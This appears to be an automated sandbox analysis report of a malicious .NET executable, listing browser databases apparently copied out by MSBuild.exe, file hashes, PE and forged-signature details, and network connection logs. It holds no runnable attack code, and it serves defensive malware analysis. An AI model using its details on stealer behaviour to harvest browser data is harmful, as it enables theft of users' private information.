SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03708713717387235
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
MD5:	85D6E1D7F82C11DAC40C95C06B7B5DC5
SHA1:	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
SHA-256:	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
SHA-512:	5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD17D.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD18E.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD19E.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD19F.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD1B0.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD1C1.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD1D1.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD1F1.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD1F2.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD270.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD291.tmp.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03708713717387235
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
MD5:	85D6E1D7F82C11DAC40C95C06B7B5DC5
SHA1:	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
SHA-256:	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
SHA-512:	5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\e69ab9e94425708f07f55437c89b2d48\msgid.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.9198862326202
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Kh7W85ONS7.exe
File size:	526'928 bytes
MD5:	395c4070233d059b2f1661fbdc6af0b4
SHA1:	c4e8741e9c21d4a5d9a45138232da82c751cc390
SHA256:	09dcf54c74a3669c9cd811df04f84601c723a7e7457b414e15a842192b8df669
SHA512:	b3214c512ad6cde7f64ec1d9e8fab416917a248e77268f8516505d8f319168445e184c0182679ed8fdbc967fb6cb94b4e4fc4e2a760bc0f50aa154da81d6b3b9
SSDEEP:	12288:IOK+cDtCaKVvTkLsDSdWg51DKWpw06aioXy3FMk:xGAZVL1D5W2Hckmk
TLSH:	C6B4122903D8C451C9FE4F3491B5E6411B34E3879D23E36E198DA1B63DA379ADB01A3E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+............."...P.............N.... ........@.. .......................@............`................................

File Icon


Icon Hash:	46165f4553a1f271

Static PE Info

General

Entrypoint:	0x47e34e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x2EFEA02B [Mon Dec 26 10:51:23 1994 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	16/03/2023 19:43:29 14/03/2024 19:43:29
Subject Chain	CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	972D707BEEE9BE12990859481BEEC354
Thumbprint SHA-1:	72105B6D5F370B62FD5C82F1512F7AD7DEE5F2C0
Thumbprint SHA-256:	5366AB98093056517BED7D4DB9B8EC5E917D91D1F1AC249A2E881806D3E992E7
Serial:	330000034EB53C7AC1846FEB2B00000000034E

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7e2fc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x80000	0x1910	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x7e200	0x2850
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x82000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7c354	0x7c400	0e21433dcac91c090f7c01c6dd03f2de	False	0.7469268737424547	data	6.934920648191149	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x80000	0x1910	0x1a00	3d1fe6ee031e81914c7cab31573e252d	False	0.29356971153846156	data	3.368287493191671	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x82000	0xc	0x200	a946a98fbfbe47e99a478bdaaa61d266	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x80250	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512			0.46639784946236557
RT_ICON	0x80538	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128			0.6216216216216216
RT_DIALOG	0x80660	0x10c	data	English	United States	0.6492537313432836
RT_DIALOG	0x8076c	0x170	data	English	United States	0.5135869565217391
RT_STRING	0x808dc	0x582	data	English	United States	0.33687943262411346
RT_STRING	0x80e60	0xb4	data	English	United States	0.55
RT_STRING	0x80f14	0x40	data	English	United States	0.6875
RT_GROUP_ICON	0x80f54	0x22	data			1.0588235294117647
RT_VERSION	0x80f78	0x618	data			0.25256410256410255
RT_VERSION	0x81590	0x380	data	English	United States	0.46763392857142855

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 09:17:58.384071112 CEST	49676	443	192.168.2.8	52.182.143.211
Jul 1, 2024 09:17:59.493500948 CEST	49677	80	192.168.2.8	192.229.211.108
Jul 1, 2024 09:18:01.196645975 CEST	49673	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:01.509067059 CEST	49672	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:03.196614981 CEST	49676	443	192.168.2.8	52.182.143.211
Jul 1, 2024 09:18:03.787995100 CEST	49707	80	192.168.2.8	216.58.206.68
Jul 1, 2024 09:18:03.793301105 CEST	80	49707	216.58.206.68	192.168.2.8
Jul 1, 2024 09:18:03.793370962 CEST	49707	80	192.168.2.8	216.58.206.68
Jul 1, 2024 09:18:03.793553114 CEST	49707	80	192.168.2.8	216.58.206.68
Jul 1, 2024 09:18:03.799288988 CEST	80	49707	216.58.206.68	192.168.2.8
Jul 1, 2024 09:18:03.799341917 CEST	49707	80	192.168.2.8	216.58.206.68
Jul 1, 2024 09:18:04.462243080 CEST	49671	443	192.168.2.8	204.79.197.203
Jul 1, 2024 09:18:04.805926085 CEST	49677	80	192.168.2.8	192.229.211.108
Jul 1, 2024 09:18:10.806058884 CEST	49673	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:11.118483067 CEST	49672	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:12.805946112 CEST	49676	443	192.168.2.8	52.182.143.211
Jul 1, 2024 09:18:12.943500042 CEST	443	49703	23.206.229.226	192.168.2.8
Jul 1, 2024 09:18:12.943671942 CEST	49703	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:15.430960894 CEST	49677	80	192.168.2.8	192.229.211.108
Jul 1, 2024 09:18:23.599113941 CEST	49703	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:23.599735022 CEST	49703	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:23.600661039 CEST	49714	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:23.600687981 CEST	443	49714	23.206.229.226	192.168.2.8
Jul 1, 2024 09:18:23.601123095 CEST	49714	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:23.601892948 CEST	49714	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:23.601913929 CEST	443	49714	23.206.229.226	192.168.2.8
Jul 1, 2024 09:18:23.604171038 CEST	443	49703	23.206.229.226	192.168.2.8
Jul 1, 2024 09:18:23.604878902 CEST	443	49703	23.206.229.226	192.168.2.8
Jul 1, 2024 09:18:23.617412090 CEST	443	49714	23.206.229.226	192.168.2.8
Jul 1, 2024 09:18:23.628138065 CEST	49715	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:23.628165007 CEST	443	49715	23.206.229.226	192.168.2.8
Jul 1, 2024 09:18:23.628329992 CEST	49715	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:23.629143000 CEST	49715	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:18:23.629175901 CEST	443	49715	23.206.229.226	192.168.2.8
Jul 1, 2024 09:18:23.629231930 CEST	49715	443	192.168.2.8	23.206.229.226
Jul 1, 2024 09:19:29.892504930 CEST	49724	80	192.168.2.8	104.16.185.241
Jul 1, 2024 09:19:29.897722006 CEST	80	49724	104.16.185.241	192.168.2.8
Jul 1, 2024 09:19:29.897797108 CEST	49724	80	192.168.2.8	104.16.185.241
Jul 1, 2024 09:19:29.897967100 CEST	49724	80	192.168.2.8	104.16.185.241
Jul 1, 2024 09:19:29.903680086 CEST	80	49724	104.16.185.241	192.168.2.8
Jul 1, 2024 09:19:30.379568100 CEST	80	49724	104.16.185.241	192.168.2.8
Jul 1, 2024 09:19:30.431118965 CEST	49724	80	192.168.2.8	104.16.185.241
Jul 1, 2024 09:19:30.438558102 CEST	49725	443	192.168.2.8	104.21.44.66
Jul 1, 2024 09:19:30.438596964 CEST	443	49725	104.21.44.66	192.168.2.8
Jul 1, 2024 09:19:30.438710928 CEST	49725	443	192.168.2.8	104.21.44.66
Jul 1, 2024 09:19:30.442599058 CEST	49725	443	192.168.2.8	104.21.44.66
Jul 1, 2024 09:19:30.442615032 CEST	443	49725	104.21.44.66	192.168.2.8
Jul 1, 2024 09:19:30.913258076 CEST	443	49725	104.21.44.66	192.168.2.8
Jul 1, 2024 09:19:30.913330078 CEST	49725	443	192.168.2.8	104.21.44.66
Jul 1, 2024 09:19:30.916738033 CEST	49725	443	192.168.2.8	104.21.44.66
Jul 1, 2024 09:19:30.916759014 CEST	443	49725	104.21.44.66	192.168.2.8
Jul 1, 2024 09:19:30.917184114 CEST	443	49725	104.21.44.66	192.168.2.8
Jul 1, 2024 09:19:30.955033064 CEST	49725	443	192.168.2.8	104.21.44.66
Jul 1, 2024 09:19:30.996519089 CEST	443	49725	104.21.44.66	192.168.2.8
Jul 1, 2024 09:19:32.135397911 CEST	443	49725	104.21.44.66	192.168.2.8
Jul 1, 2024 09:19:32.135536909 CEST	443	49725	104.21.44.66	192.168.2.8
Jul 1, 2024 09:19:32.135708094 CEST	49725	443	192.168.2.8	104.21.44.66
Jul 1, 2024 09:19:32.136796951 CEST	49725	443	192.168.2.8	104.21.44.66
